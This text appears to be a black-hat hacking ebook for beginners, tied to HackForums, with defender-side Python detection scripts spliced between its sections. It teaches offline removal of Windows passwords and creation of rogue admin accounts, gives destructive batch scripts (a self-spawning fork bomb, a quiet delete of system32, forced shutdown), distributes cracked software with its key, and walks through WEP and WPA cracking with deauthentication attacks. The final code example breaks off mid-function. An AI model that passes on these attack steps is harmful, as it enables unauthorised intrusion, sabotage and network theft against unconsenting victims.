Into the Hacker's Mind
Index:
Introduction
Chapter 1: Making it clear
  I. The word "hacker"
  II. Different types of hackers
    -a- Black hats
    -b- White hats
    -c- Grey hats
Chapter 2: The first steps
  I. Beginners' fun
    -a- Windows user passwords
    -b- Getting admin
    -c- Changing IP and VPNs
    -d- Batch virus
  II. Wifi hacking
    -a- WEP
    -b- WPA/WPA2
  III. Online accounts hacking
    -a- Phishing
    -b- Keyloggers
    -c- RATs
Chapter 3: Because "Chapter 2" is too easy!
  I. Website attacks
    -a- SQL injection
    -b- XSS / cross-site scripting
    -c- DOS/DDOS
    -d- Defacing
  II. Next level: botnets
  III. Worms??
  IV. Booters
Chapter 4: Some coding and programming
  I. Intro
  II. Stealers
    -a- Builder
    -b- Stub
  III. Loggers
    -a- Builder
    -b- Stub
  IV. Crypters
    -a- Builder
    -b- Stub
    -c- Runtime module
Chapter 5: Pentesting and BackTrack
  I. Introduction to penetration testing
  II. Network scanning and information gathering
  III. Social engineering toolkit and DNS spoofing
  IV. Metasploit
    -a- Intro
    -b- Payloads/stagers
    -c- Meterpreter
Chapter 6: Extra: To keep your ass out of trouble
Chapter 7: From a hacker to another
Hello and welcome to the hacking world. This ebook was written by CyberGod to help any new or intermediate hacker. This isn't an informative book nor a hacking dictionary; instead you can consider it like a teacher that will help you through your journey. This means that everything you learn from this book can be applied and used directly, rather than being just information about various subjects.
Now that you know what you will be reading, I would like to mention that I am not responsible for any action you take based on what you learned from this book. And I would like to thank the whole awesome HF community; if you downloaded this book from somewhere else and you are not a member of HF, I suggest you go and register for an account right now.
http://www.hackforums.net
Chapter 1: Making it clear.
I. The word 'Hacker'
You want to be a hacker? OK... but first things first: what does the word 'hacker' refer to?
Usually a hacker is a person with great knowledge of computing and/or electronics, and by great I mean more than an average person. Now when most people hear the word hacker it is associated with evil and bad actions like hacking bank accounts or websites... But you must know that not all hackers use their knowledge for bad things. A hacker's activities include account hacking, pentesting, programming, RATs/botnets, making money... and a bunch more. Before ending this small section I would like to say that anyone who wants to be an advanced or expert hacker must learn how to program and code in several languages; for a total newbie I suggest starting with something like HTML or VB.NET, as these are easy to learn.
II. Different types of hackers
-a- Black hats
Black hat hackers are the bad guys, and you must know this is a black hat book. Black hat hackers usually try to hack into all types of accounts, from online banks and PayPal to Facebook and MSN, using different methods like RATs, keyloggers and fake pages. A more advanced black hat hacker will want to write his own crypters and RATs and try to build a huge botnet to take down servers and websites.
Black hat hackers are always trying to break any security system or bypass AV and firewalls; some of them also like to use social engineering to trick people into their traps.
The causes? Well, I can only think of two main causes: making money, or proving themselves and acquiring forbidden knowledge.
-b- White hats
White hats are the opposite of black hats. These guys use their knowledge to help others; they usually code AV and offer help to infected systems; they try to build what black hats destroy.
There is not a lot to be told about them, just know that they are the opponents of black hats in an endless war.
-c- Grey hats
As you can guess, a grey hat hacker is a mix of a black and a white hat hacker. Usually they want no harm to others but can turn into a black hat to accomplish their goals.
Chapter 2: The first steps
I. Beginners' fun
-a- Windows User Passwords
In this chapter you will learn how to remove any user password on a Windows operating system. I know this may sound noob or too easy for some, but for a beginner this will be an excellent first lesson.
Before going directly into action I would like to explain how we are going to remove that password. By the way, I will be showing you 2 methods. First of all you must know that Windows user passwords are stored (as hashes, in the SAM registry hive) on the hard disk, so using a simple bootable program we can get full access to that disk, remove the password and then boot again into Windows. Don't worry if you didn't understand a word, because I will explain everything. One caveat: this only works when the disk is not encrypted; full-disk encryption such as BitLocker keeps the offline tool from reading the hive. The second method can be used only with a Windows XP operating system: what you actually do is log in to the hidden, unprotected user "Administrator" and remove the passwords of the other users from there.
.1. Enough talking, let's get to action. I will explain the second method first. Assuming you are on the login screen and you are asked for the password, all you have to do is press Ctrl+Alt+Del, then, keeping Ctrl and Alt pressed, release the Del key and press it again. You should be presented with a login form where you can enter a user name and a password; in the user field write "Administrator" and leave the password field blank. Now you should be able to log in as the Administrator user. Once there you can remove any other user's password without knowing the old one. Finally, you should know that the Administrator user can be protected by a password, in which case this method won't work any more; but by default it comes with no password and most people don't know about that user, so most of the time it will be unprotected. Note that this trick applies to the Welcome screen of XP Professional; on XP Home the built-in Administrator account is only reachable in Safe Mode.
.2.
Now for the other method. You will need a blank CD or DVD, a CD/DVD burner and burning software; I am going to be using Nero but you can use any other burning software. Now, in Nero choose "Burn image" and select the "password-reset.iso" provided in the "Files" folder. Insert a blank CD and click Burn; you should end up with a bootable CD. I want to mention that we can also use a USB stick instead of a CD; just follow the instructions provided by the "README.txt" inside the ISO image.
The next step is to boot from the CD/DVD/USB. For that you have to insert your CD/DVD/USB, restart your computer, and follow the instructions below:
When the computer is starting you will get a message similar to "Press F1 to enter BIOS setup". F1 isn't the standard key for all BIOSes; it varies from one to another. To enter the setup simply press the correct key. Now in the BIOS go to the tab "Startup" or "Boot" and change the boot order: if you are booting from a CD or DVD put the CD/DVD drive at position 1; if you want to boot from a USB stick then choose the corresponding device and put it at position 1.
In my case I chose the DVD device to be #1. Next you need to save and exit. After the setup exits your computer should reboot and it will boot from the CD; press Enter and wait for the program to load.
The first thing you will be asked is to choose the correct partition. This means that if your HDD is divided into several partitions (e.g. C:\ and D:\) you need to choose the system partition (the one containing the "Windows" folder and files); in my case it is number "2", so I will just type "2" and hit Enter.
Next we want to point the program to the config folder. Don't panic, it is usually "Windows/system32/config" and you get this option by default, so just press Enter without typing anything.
Now choose "Password reset", which is number "1".
Then "Edit user data and passwords".
Now you need to choose the user whose password is to be removed. For that you need to type the whole name of the user, and it is case sensitive (you will be provided with the user list).
Then you will be provided with several useful options. We are going to use option "1", or if you want to change the password rather than remove it, choose "2" and hit Enter.
You will get the message "Password cleared!". Now type "!" and press Enter. You will be asked: "About to write file(s) back! Do it?" By default it is [n], which means "no" and would discard the changes, so we want to type "y" for yes and press Enter. Press Enter for the next message and you are done. Remove the CD and press Ctrl+Alt+Del to reboot.
After the reboot you will notice that the password was removed. Don't forget to choose your HDD as the boot device in the BIOS after you are done. This is the end of our first lesson.
-b- Getting admin
That is actually pretty simple on a Windows machine; you will learn 2 different ways to do it. And if you are asking why I am always targeting Windows machines, the answer would be that Windows is the most used operating system and the easiest to hack. Now to action.
Method 1: You are going to use CMD, also known as the command prompt. For me this method is useless because you need to be an administrator in the first place; all it does is add another administrator user. But it can come in handy some day if the account you are in is monitored or has some restriction, I don't know... Here is what you need to do. Open cmd by going to "Run" and typing CMD.exe, or open Notepad and type in:
cmd
then save it as anything.BAT; it is important to add .bat at the end of the name so it is treated as a batch file.
Once in CMD type:
net user <username> <password> /add
net localgroup Administrators <username> /add
The first line creates the local account (net localgroup on its own only adds an account that already exists), and the second adds it to the Administrators group; both need an elevated prompt. Replace <username> and <password> with the values you want and press Enter after each line. Now log out and you should see the new administrator user.
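A defender's view of the same two commands, as an added example that is not part of the original book: the Python below parses a constructed, simplified text rendering of Windows Security events (4720 "user account created", 4732 "member added to a security-enabled local group", 4624 logon; the key=value layout and the sample values are assumptions, not a real export) and reports every addition to Administrators, marking the ones where the account was created moments earlier, which is exactly the footprint net user ... /add followed by net localgroup Administrators ... /add leaves.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed sample, loosely modelled on Windows Security log fields for
# 4720 (user account created), 4732 (member added to a security-enabled
# local group) and 4624 (logon). Not a real export.
SAMPLE_LOG = """\
2024-05-01T09:12:03Z EventID=4720 SubjectUserName=alice TargetUserName=svc_backup
2024-05-01T09:12:09Z EventID=4732 SubjectUserName=alice TargetGroupName=Administrators MemberName=PC01\\svc_backup
2024-05-01T10:00:00Z EventID=4624 SubjectUserName=bob LogonType=2
2024-05-01T13:40:41Z EventID=4720 SubjectUserName=helpdesk TargetUserName=tmpuser
2024-05-01T13:40:45Z EventID=4732 SubjectUserName=helpdesk TargetGroupName=Administrators MemberName=PC01\\tmpuser
2024-05-01T15:02:10Z EventID=4732 SubjectUserName=SYSTEM TargetGroupName="Remote Desktop Users" MemberName=PC01\\guest
2024-05-02T08:30:00Z EventID=4732 SubjectUserName=bob TargetGroupName=Administrators MemberName=PC01\\bob
"""

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')   # key=value, value may be quoted


@dataclass
class Finding:
    when: datetime
    actor: str             # SubjectUserName: who ran "net localgroup ... /add"
    member: str            # account that became a local administrator
    freshly_created: bool  # a 4720 for that account preceded it within the window


def parse_events(text):
    """Turn 'timestamp key=value ...' lines into dicts with a parsed time."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        stamp, _, rest = line.partition(" ")
        event = {"time": datetime.fromisoformat(stamp.replace("Z", "+00:00"))}
        for key, value in FIELD_RE.findall(rest):
            event[key] = value.strip('"')
        events.append(event)
    return events


def find_admin_additions(events, window=timedelta(minutes=10)):
    """Return every addition to Administrators, noting create-then-promote pairs."""
    created = {}    # lower-cased account name -> time of its 4720
    findings = []
    for event in events:
        event_id = event.get("EventID")
        if event_id == "4720":
            created[event["TargetUserName"].lower()] = event["time"]
        elif event_id == "4732" and event.get("TargetGroupName", "").lower() == "administrators":
            member = event["MemberName"].split("\\")[-1]   # drop the machine/domain prefix
            born = created.get(member.lower())
            fresh = born is not None and event["time"] - born <= window
            findings.append(Finding(event["time"], event["SubjectUserName"], member, fresh))
    return findings


if __name__ == "__main__":
    for f in find_admin_additions(parse_events(SAMPLE_LOG)):
        flag = "NEW ACCOUNT" if f.freshly_created else "existing account"
        print(f"{f.when:%Y-%m-%d %H:%M} {f.actor} added {f.member} to Administrators ({flag})")
```

Run against the sample it reports three additions; the two create-then-promote pairs are the pattern worth an alert, while bob's self-addition shows up as an existing account being escalated. Adding the "Remote Desktop Users" group to the watch list is a one-line change if that matters in your environment.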
Method 2: For this method you need to do exactly the same thing we did with the "Password reset" (see above) until you reach the user options stage.
Now you need to choose option 3 "Promote user" and continue the same way we did for removing the password.
The End
-c- Changing IP address and VPNs
Why would I want to change my IP? And what is a VPN? Well, I will answer your questions right now. If you are going to hack a website or RAT someone you obviously don't want to be tracked, so changing your IP is going to help you a lot. Changing your IP can also help bypass some restrictions like a banned IP.
Now for the VPN part. VPN stands for Virtual Private Network; using a VPN service creates an encrypted tunnel between you and the provider. This means that nobody on the path between you and the provider can read your traffic, and if someone traces a connection back it will lead to the VPN provider and not to your personal computer. Keep in mind that the provider itself sees everything you send through it and may keep logs, so the protection is only as good as the provider.
I will talk no longer about VPNs, because it is easy to get one; there are some free VPNs out there but the best ones charge money.
Now, how to change your IP: you are going to need a proxy changer program and a proxy list. A proxy is simply an IP+port; you connect to that IP on that port and send your traffic through it. I will be using a program called "Proxy Switcher"; it is a paid program but I provided you with a cracked copy, you can find it in "Files" under the name "Proxy-Switcher.rar".
Now follow the instructions:
1- Installing Proxy Switcher:
First extract the rar archive and install Proxy Switcher. After the installation is done, right click on the Proxy Switcher icon in the task bar and click "Register Proxy Switcher"; use any name with the key I provided in key.txt. Now exit Proxy Switcher, launch it again and you are good to go.
2- Finding fresh proxies: Well, this part is more like a Google search; you need to search for "proxy list" or "fresh proxy list", or you can use Proxy Switcher itself to search for proxies for you. Here is how you do that.
.a. Using Proxy Switcher:
Right click on the task bar icon --> Show Manager.
Now click the "Common task wizard".
Click "Next", then choose the first option in the common tasks and click Finish.
Then wait for the program to fetch the proxies and scan them, and you will have a list of dead and working proxies. Now double click on any working one and you are good to go.
Note: Sometimes your internet connection may get slower depending on the speed of the proxy server. And you won't always find proxies using Proxy Switcher, so I prefer searching on Google. Also remember that a public proxy from a random list belongs to a stranger who can read and alter everything you send through it unencrypted, so don't log in to anything you care about over one.
.b. Using Google (better):
Simply go to Google and search for "fresh proxy list", get any list that you think is fresh, then copy it to Notepad and save it. Now go to Proxy Switcher --> File --> Import from text file... and choose the txt file you saved the list in.
Now click on New and you should have a list of unchecked proxies.
Click on "Test proxy servers for availability" and wait for the scan.
Now you should get working and dead proxies. Choose one of the working proxies and connect to it, then go and check whether your IP has changed. Here is a trick: if you get no working proxy you can choose a dead one with a relatively small ping/response time and connect to it, and it should work.
Before I conclude, here is a list of free VPN services:
proXPN
CyberGhost
Hotspot Shield
GPass
SecurityKISS
and a bunch more...
-d- Batch Virus
"Batch file is the name given to a type of script file, a text
file containing a series of commands to be executed by the
command interpreter.
The commands may be built into the command processor
(COPY), supplied with the operating system but not built
into it (XCOPY invokes the Microsoft DOS program
XCOPY.EXE), or may be any program (cp invokes the
program cp.exe if present, an .EXE port of the Unix cp
command, with essentially the same functionality as
XCOPY.EXE).
Similar to job control language and other systems on
mainframe and minicomputer systems, batch files were
added to ease the work required for certain regular tasks
by allowing the user to set up a script to automate them.
When a batch file is run, the shell program (usually
COMMAND.COM or cmd.exe) reads the file and executes
its commands, normally line‐by‐line.[1] Unix‐like operating
systems (such as Linux) have a similar type of file called a
shell script.[2]
The filename extension .bat was used in DOS, and the
Windows 9x family of operating systems. The Microsoft
Windows NT‐family of operating systems and OS/2 added
.cmd. Batch files for other environments may have
different extensions, e.g. .btm in 4DOS and 4NT related
shells." Thanks Wikipedia.
Now that you know what a batch file is, I will give a list of some commands with a description, then jump to the part where we use these commands to make simple evil viruses. (Don't be afraid of the list, you don't have to memorise it :P, we will be using only a few of these commands.)
Commands list:
@ In DOS version 3.3 and later, hides the echo of a
batch command. Any output generated by the command is
echoed. The at‐sign can be prefixed to any DOS command,
program name, or batch file name within a batch file.
@[command]
examples @ {Separates sections of the batch file without displaying the DOS prompt.}
@echo OFF {Hides the echo off report.}
%DIGIT Replaceable batch parameters which are defined
by the user when the batch is executed. The parameters
are separated by spaces, commas, or semicolons.
%digit {Digit: any digit from 0 to 9. %0 has the
value of the batch command as it appears on the
command line when the batch is executed. %1 represents
the first string typed after the batch commmand. Each
occurrence of %digit is replaced by the corresponding
string from the batch command line.}
examples MYBATCH DOC A:
COPY *.%1 %2 {Copies all .DOC files in the default
directory to drive A:}
%VARIABLE% Replaces the DOS environment variable name with its environment value.
%variable% {Variable: a string of uppercase characters in the environment associated with a string value. Variable is created in the environment by using SET.}
examples %PATH% {Returns the value of PATH, the
current search path, which is executable.}
echo %PATH% {Displays the value of PATH, the
current search path.}
%PROMPT% {Returns the value of PROMPT, the
current prompt string, which is executable.}
echo %PROMPT% {Displays the value of PROMPT,
the current prompt string.}
echo The current search path is: %PATH% {Displays
the message including the current search path.}
set USER=John
if %USER%==John goto LABEL {Since the value of USER does equal "John", control is transferred to the label LABEL.}
CALL Loads and executes a batch file from within a
batch file as if it were a external command. When a
second batch file completes, control is returned to the
calling file.
call [drive:][path]filename [batch‐parameters]
Before DOS version 3.3:
command /c [drive:][path]filename [batch‐parameters]
CLS Clears the video display screen, setting the cursor in
the upper left‐hand corner.
cls
ECHO Controls whether commands and comments
within a batch file are displayed.
echo [ON|OFF|message|.]
examples echo {Displays echo status}
echo ON {Restores normal display activity.}
echo OFF {Halts display of DOS prompt and
commands.}
echo Processing... {Displays "Processing..." on the
screen.}
echo %USER% {Displays the value of USER on the
screen.}
echo. {Displays a single blank line on the screen.}
echo ^L > prn {Sends an ASCII control‐code (form
feed) to the printer. Press <Ctrl> plus <L> to type the ^L
character.}
echo Y|Del *.* {Answers the DEL "Are you sure"
question automatically.}
FOR Repeats the operation of a DOS command for each
member of a list. Use CALL to execute a batch file as a
command.
for %%argument in (list) do command {Argument:
any letter from A to Z. List: a sequence of strings separated
by spaces or commas. Wildcards are allowed.}
examples for %%d in (A,C,D) do DIR %%d *.*
{Displays the directories of drives A, C, and D
sequentially.}
for %%f in (*.TXT *.BAT *.DOC) do TYPE %%f
{Types the contents of all .TXT, .BAT, and .DOC files in
the current default directory.}
for %%P in (%PATH%) do if exist %%P\*.BAT COPY %%P\*.BAT C:\BAT {Copies all batch files which exist in any directory on the DOS command search path into the directory C:\BAT.}
for %%f in (*.PAS) do call compile %%f {Compiles all
.PAS files in the current default directory.}
GOTO Transfers control within a batch file to a line
identified by a label. The label must be of the form
":LABEL".
goto LABEL
:LABEL
IF Tests a condition and executes a command only if the
condition is TRUE. But if the NOT modifier is present, the
command will be executed only if the condition is FALSE.
if [not] condition command {Condition: errorlevel number; string1==string2; or exist filename. Command: any DOS command, batch command, batch file name, or program name.}
examples if [not] errorlevel number command
{Errorlevel: an exit code returned by a program or an
external command. The following DOS commands return
an exit code: BACKUP, RESTORE, FORMAT, REPLACE, and
XCOPY. Number: a numerical value (integer) against which
the exit code is compared. The condition is TRUE if the exit
code returned by the previous program is greater than or
equal to number. The condition is FALSE if the exit code is
less than number.}
BACKUP C:\*.* A: /s
if errorlevel 3 goto TROUBLE {If the BACKUP command
exits with a code of 3 or higher, control will be transferred
to the label TROUBLE.}
if errorlevel 3 if not errorlevel 4 echo ERROR #3
occurred
if errorlevel 4 if not errorlevel 5 echo ERROR #4 occurred
{Nested if statements that determine the exact error
number.}
if [not] string1==string2 command {The condition is TRUE if both strings are identical. The comparison is case sensitive. If either string is blank, a syntax error occurs.}
if (%1)==(LTRS) CD C:\WORD\LTRS {If the first parameter is LTRS, then change directory to LTRS.}
if "%1"=="" goto ERROR {If there is no parameter, then control is transferred to label ERROR.}
if not %2X==X DIR %2\*.* {If there is a second parameter, then display all the files contained in the directory %2.}
if not "%3"=="" if not "%3"=="b" if not "%3"=="B" goto BADPARAM {If there is a third parameter and it is anything other than b or B, then go to label BADPARAM.}
if [not] exist filename command {The condition is
TRUE if filename can be located. The filename can include
drive and path specifications. Wildcards are allowed.}
if exist D:\%1\nul CD %1 {Tests for the existence
of directory %1 even if it contains no files, then changes to
that directory if it exists.}
if not exist A:\FLASH.EXE COPY C:\PROJECTS\FLASH.EXE A: {Copies FLASH.EXE to drive A, but only if it doesn't exist there already.}
PAUSE Pauses the running of a batch file and displays
the message "Press any key to continue ..." on the screen.
If the optional message is included, it will be displayed
first. Use pause to optionally terminate the batch file with
<Ctrl‐Break> at a safe place. The optional message is not
displayed when echo is OFF, so the message must be
echoed on the preceding line.
pause [message]
examples pause {Displays "Press any key to
continue ...".}
pause < nul {Waits with no comment.}
pause Do you want to continue? {Displays "Do you
want to continue?" with "Press any key to continue ..." on
the next line.}
REM Adds remarks to a batch file.
rem [remark]
examples @rem {Hides the remark from display.}
SET Set will view the DOS environment or create, change,
or delete environment values.
set [variable=[value]] {Variable: a string of
characters, unbroken by spaces, which are converted to
uppercase letters in the environment. Value: a string of
characters, case specific, associated with variable.}
examples set {Display the entire DOS environment.}
set USER=John {Sets the value of USER to the
string, "John".}
set USER= {Removes USER from the
environment.}
set PATH=C:\;C:\DOS {Sets C:\;C:\DOS as the
current search path.}
set PATH=%PATH%;C:\TEST {Appends ;C:\TEST to
the current search path.}
SHIFT Shifts any parameter on the command line one
position to the left. Use SHIFT to refer to multiple
parameters by one name or to use more than ten
parameters on a single command line.
shift
examples :LOOP
COPY %1 A:
shift
if not (%1)==() goto LOOP {Beginning with the first
parameter, all the parameters listed on the command line
are iterated and a file, the value of the parameter, is
copied to A:.}
Miscellaneous
command > nul {Redirects command output to
oblivion.}
command > file {Redirects command output to
file.}
command >> file {Appends command output to
file.}
command < file {Redirects file output to
command.}
PATH {Displays "PATH=" followed by the value of
PATH, the current search path.}
PATH directories {Sets directories as the current
search path.}
PATH = directories {Sets directories as the current
search path.}
PATH; {Disables extended command searching and
confines the searching to the default directory.}
PROMPT {Resets the prompt string to its default, $n
$g.}
CD {Displays the current directory and its path.}
. {Represents the default directory (If PATH=D:\;C:
\SYS;C:. then current directory will be searched after D:
and C:\SYS).}
.. {Represents the parent of the default directory
(C:\TOOLS\WP\LTRS.DOC is the same as ..\WP
\LTRS.DOC).}
%% {A literal "%".}
End of list
Now to the cool part: I will show you several batch files that can be used to harm someone's PC or just to prank someone. For all the following examples you need to type the code in Notepad and save it as "something.BAT"; adding ".BAT" at the end is a must, so it is saved as a batch file.
1- Open endless windows:
@echo off
:loop
start file.bat
goto loop
#How the code works: "file.bat" is the name of your batch file; you can change it if you want, but it must match the name you save the file under.
":loop" is a label; goto can only jump to a label, not to a file name.
"start file.bat": opens a new window running file.bat.
"goto loop": goes back to the previous line and opens another window. So this is an endless loop of opening windows, and the best part is that every new window will start opening new windows too. This can crash an old, weak computer.
2- Delete a file or folder
@echo off
del /q "c:\windows\system32"
These two lines may appear pretty simple but can have a devastating effect on a Windows operating system. We are simply using the "del" command to delete the contents of a specific folder, in this case the "system32" folder (the files directly inside it; subfolders are left alone unless you add /s). The tricky part is the "/q" after "del": adding this deletes the files without asking the user for confirmation. Note that it has to run as an administrator, and even then files that are in use or protected by the OS refuse to go, so the result is a broken system rather than an empty folder.
3- Shutdown computer
Usage: shutdown [-i | -l | -s | -r | -a] [-f] [-m \\computername] [-t xx] [-c "comment"] [-d up:xx:yy]
  No args            Display this message (same as -?)
  -i                 Display GUI interface, must be the first option
  -l                 Log off (cannot be used with -m option)
  -s                 Shutdown the computer
  -r                 Shutdown and restart the computer
  -a                 Abort a system shutdown
  -m \\computername  Remote computer to shutdown/restart/abort
  -t xx              Set timeout for shutdown to xx seconds
  -c "comment"       Shutdown comment (maximum of 127 characters)
  -f                 Forces running applications to close without warning
  -d [u][p]:xx:yy    The reason code for the shutdown
                     u is the user code
                     p is a planned shutdown code
                     xx is the major reason code (positive integer less than 256)
                     yy is the minor reason code (positive integer less than 65536)
Very clear, no need to explain anything.
Conclusion: Using cmd commands you can do pretty much any task in Windows; the above examples just show you how to play with built-in commands to achieve your own goals...
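The other side of this section is recognising these scripts when they land on a machine. As an added example (not from the book), here is a small static triage script in Python that a responder would run over .bat/.cmd files to catch the three idioms shown above: a script that launches itself again, an unattended delete under the Windows directory, and a forced or unattended shutdown. The sample scripts embedded in it are constructed for the demonstration.

```python
import re

# Paths under which an unattended delete is almost never legitimate
SYSTEM_PATH = re.compile(r'(%systemroot%|%windir%|[a-z]:\\windows\\)', re.I)
# References a batch file can make to itself: %0, %~f0, %~nx0 ...
SELF_REF = re.compile(r'%~?[a-z]*0\b', re.I)


def _self_spawning(line, filename):
    """'start' that launches the script itself (by %0-style reference or by its own name)."""
    m = re.match(r'\s*@?start\b(.*)', line, re.I)
    if not m:
        return False
    rest = m.group(1)
    if SELF_REF.search(rest):
        return True
    return bool(filename) and filename.lower() in rest.lower()


def _quiet_delete_system(line, _filename):
    """del/erase/rd with /q or /s aimed at the Windows directory."""
    return (re.match(r'\s*@?(del|erase|rd|rmdir)\b', line, re.I) is not None
            and re.search(r'/[qs]\b', line, re.I) is not None
            and SYSTEM_PATH.search(line) is not None)


def _forced_shutdown(line, _filename):
    """shutdown with -s/-r (power off or reboot) or -f (kill apps without warning)."""
    return (re.match(r'\s*@?shutdown\b', line, re.I) is not None
            and re.search(r'[-/][srf]\b', line, re.I) is not None)


RULES = [
    ("self-spawning", _self_spawning),
    ("quiet-delete-system", _quiet_delete_system),
    ("forced-shutdown", _forced_shutdown),
]


def scan_batch(text, filename=None):
    """Return (line number, rule name, stripped line) for every line that trips a rule."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, check in RULES:
            if check(line, filename):
                findings.append((lineno, name, line.strip()))
    return findings


# Constructed samples: the three scripts from this section, plus a harmless one.
FORK_BOMB = r"""@echo off
:loop
start "" "%~f0"
goto loop
"""

WIPER = r"""@echo off
del/q "c:\windows\system32"
"""

SHUTDOWN = r"""shutdown -s -f -t 0 -c "Goodbye"
"""

BENIGN = r"""@echo off
rem nightly copy of reports
xcopy C:\reports D:\backup\reports /s /y
del /q D:\backup\tmp\*.*
shutdown -a
"""

if __name__ == "__main__":
    for label, script in [("fork bomb", FORK_BOMB), ("wiper", WIPER),
                          ("shutdown", SHUTDOWN), ("benign", BENIGN)]:
        print(label, scan_batch(script))
```

The file name matters for the book's own variant (start file.bat inside file.bat), which is why scan_batch takes it as a parameter; without it that line is indistinguishable from a script that starts some other file.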
II. Wifi Hacking
In this section I will show you how to crack two different types of wifi encryption, WEP and WPA/WPA2. In both sections we will be using BackTrack 5 R2, so if you don't have it go download it now; it is free from the official site. I use the KDE 32-bit build but any other version of BT 5 will do. For those who don't know what BackTrack is: "BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking." (BackTrack has since been discontinued and succeeded by Kali Linux, which ships the same aircrack-ng tools.)
Here is the official website: http://www.backtrack-linux.org/
Download BackTrack, burn it to a DVD and boot from it. Once you are in, type "startx" (lower case) to change from the text login to the graphical desktop.
Black screen fix:
1) Insert the live DVD.
2) In GRUB (when asked to choose a boot option) press TAB to edit the boot line.
3) You will see something like this:
file=/cdrom/preseed/ubuntu.seed boot=casper initrd=/casper/initrd.gz
Add "xforcevesa noapic noacpi nosplash irqpoll --" after initrd.gz.
This should fix the problem.
-a- WEP
WEP is relatively easy to crack, especially with BT 5 and "Gerix Wifi Cracker". One more thing: if you want to experiment with all aircrack-ng features you will need a compatible wireless card (one whose driver supports monitor mode and packet injection); I suggest Alfa Network wireless adapters.
First we need to open Gerix Wifi Cracker: "Backtrack -> Exploitation Tools -> Wireless Exploitation Tools -> WLAN Exploitation -> gerix-wifi-cracker-ng".
Next go to the "Configuration" tab, select your wireless card interface, usually "wlan0" or "wlan1", and click "Enable/Disable Monitor Mode".
A new interface should appear under the name "mon0" with "Monitor" as its mode. If that doesn't happen, or if the mode isn't "Monitor", then your wireless card probably isn't compatible. Anyway, let's move on: now select the new monitor interface and click "Rescan networks". You will get a list of all wireless networks near you; ESSID is the name of the network and BSSID is the MAC address of the access point. You will also need to check the "Enc" (encryption) column; for this part the network should have "WEP" encryption. Select a suitable network and move to the "WEP" tab.
First we need to collect some packets; go to the "General functionalities" section and click "Start Sniffing and Logging".
A new terminal will appear, showing the packet capture and all the clients connected to the attacked access point (router). The number under "#Data" is how many data packets (and so how many WEP IVs) we have captured, and the MAC addresses under "Station" are the clients connected to the AP; in my case there is only one device connected, with the MAC address "7C:11:BE:91:FF:E6" (I can tell it is an iPhone from the MAC address).
The more devices using the AP, the faster we will collect packets; our goal is above 10,000 data packets. Now for the attacks: in my case I am using an Intel wireless card so the attacks won't have a big effect, but I will show you how to do them. I will go with "WEP Attacks (no-client)" because this will work even if there is no device connected to the wireless network.
We have two types of attacks in the no-client section: ChopChop and fragmentation. Here is a list of pros and cons:
Fragmentation
Pros
- Can obtain the full packet length of 1500 bytes of xor (keystream). This means you can subsequently pretty well create any size of packet.
- May work where chopchop does not.
- Is extremely fast. It yields the xor stream extremely quickly when successful.
Cons
- Needs more information to launch it, i.e. IP address info. Quite often this can be guessed. Better still, aireplay-ng assumes source and destination IPs of 255.255.255.255 if nothing is specified. This will work successfully on most APs. So this is a limited con.
- Setup to execute the attack is more subject to the device drivers. For example, Atheros does not generate the correct packets unless the wireless card is set to the MAC address you are spoofing.
ChopChop
Pros
- May work where frag does not work.
- You don't need to know any IP information.
Cons
- Cannot be used against every access point.
- The maximum xor length is limited to the length of the packet you chopchop against.
- Much slower than the fragmentation attack.
I will start with the ChopChop attack: first click "Start false access point Authentication on victim".
Then "Start ChopChop attack"; type "y" for yes in the new window and press Enter. Wait some seconds, then press "Create the ARP packet to be injected on the victim access point".
Finally "Inject the created packet on victim access point".
Follow the same steps for the fragmentation attack; they are very similar.
Now we wait until we get more than 10,000 - 15,000 packets. (That figure is a rule of thumb: with the PTW attack, aircrack-ng's documentation suggests about 20,000 IVs for a 64-bit key and 40,000 or more for a 128-bit key; if the crack fails, keep capturing and try again.)
Then go to "Cracking" -> "WEP cracking" and click "Aircrack-ng - Decrypt WEP password"; wait for it to finish and you will get your key. Remove the ":" separators from it, so in my case it will be "2400242890".
-b- WPA/WPA2
This attack needs at least one client connected to the AP, because what we capture is the 4-way handshake between the client and the AP, and that handshake is the only thing a password guess can be checked against.
Same as WEP until you choose a network to crack; for this you need the network to have WPA or WPA2 encryption. Select it, then go to the "WPA" tab.
Now "Start Sniffing and Logging".
Now we need to get a "handshake" so we can run a dictionary attack on the password. To do that open "WPA attacks" and click "autoload victim clients".
Now click "client deauthentication", wait for it to finish and you will get "WPA handshake: <AP BSSID>" (if not, try increasing the deauth number; it is 4 by default).
-> Waiting for client deauthentication.
After we get a handshake we are ready to start cracking, so first we need a dictionary file; it is basically a very big list of passwords, and you can find one easily if you Google it. I will assume you got your dictionary file; now go to "Cracking" -> "WPA bruteforce cracking". In "normal cracking" type the location of your dictionary file (including the file's name) and click "Aircrack-ng - Crack WPA password".
Almost done: if your dictionary contains the passphrase, aircrack-ng will recover it. If it doesn't, no amount of waiting will help; each candidate is run through 4096 rounds of PBKDF2 and compared against the handshake, and a passphrase that isn't in the list is simply never tried.
This concludes the second section of chapter 2.
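To show what aircrack-ng is actually doing in that last step, here is an added example (Python, not part of the original book and not aircrack-ng's code) that derives the PMK from a candidate passphrase with PBKDF2-HMAC-SHA1, expands it to the PTK with the 802.11 PRF, and checks the MIC of message 2 of the 4-way handshake against each word of a tiny dictionary. The SSID, MAC addresses, nonces and EAPOL frame are constructed values, not a capture; the "captured" MIC is produced by the same derivation from an assumed passphrase so the whole thing runs offline.

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal PMK: PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: concatenated HMAC-SHA1(key, label || 0x00 || data || i), truncated."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)          # 4 * 20 bytes = 80 >= 64
    )
    return out[:64]


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of the MACs and nonces)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
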